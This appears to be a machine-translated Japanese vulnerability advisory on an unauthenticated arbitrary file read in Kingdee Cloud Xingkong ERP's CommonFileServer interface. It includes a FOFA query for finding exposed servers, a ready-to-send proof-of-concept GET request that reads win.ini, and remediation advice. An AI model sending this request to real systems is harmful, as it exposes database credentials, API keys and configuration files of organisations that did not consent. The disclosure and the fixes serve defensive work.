0x01 製品紹介
Kingdee Yunxingkong は、財務管理、サプライ チェーン管理、ビジネス プロセス管理のための統合ソリューションを企業に提供するクラウドベースのエンタープライズ リソース管理 (ERP) ソフトウェアです。Kingdee Cloud Xingkong は、複数の組織と複数のプロフィットセンターを抱える大企業および中堅企業に焦点を当て、「オープン性、標準化、ソーシャルインタラクション」の 3 つの特徴を備えたデジタルエコノミー時代の企業向けにオープンな ERP クラウド プラットフォームを提供します。サービス内容は、金融、サプライ チェーン、インテリジェント マニュファクチャリング、アメーバ管理、オムニチャネル マーケティング、電子商取引、人事、エンタープライズ インターネット サービスをカバーし、企業のデジタル マーケティングや経営再構築などの新しいエコロジーの実現を支援し、企業のデジタル能力。
0x02 脆弱性の概要
Kingdee Cloud Starry CommonFileServer インターフェイスの権限設定が不適切なため、認証されていない攻撃者はこの脆弱性を利用して、データベース認証情報、API キー、構成ファイルなどを含むサーバー上の任意のファイルにアクセスし、システム権限や機密情報を取得する可能性があります。
0x03 影響範囲
バージョン 6.x、バージョン 7.x、バージョン 8.x (すべて影響を受ける)
0x04 再発環境
FOFA: app="キングディークラウド星空管理センター"
0x05 脆弱性の再発
実証実験
GET /CommonFileServer/c%3A%2Fwindows%2Fwin.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.79
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive 追記: この脆弱性は比較的単純かつ失礼なもので、/CommonFileServer/ パス (特殊なシンボル URL エンコーディング) の直後にファイル名を接続するだけです。
IIS 構成ファイルを読み取る
0x06 修復の提案
インターネットへの公開をオフにし、ディレクトリのアクセス許可を設定する
データの浄化: ユーザーによって渡されたファイル名パラメータをハードコードまたは均一にコード化し、ファイル タイプをホワイトリストに登録し、悪意のある文字または null 文字を含むパラメータを拒否します。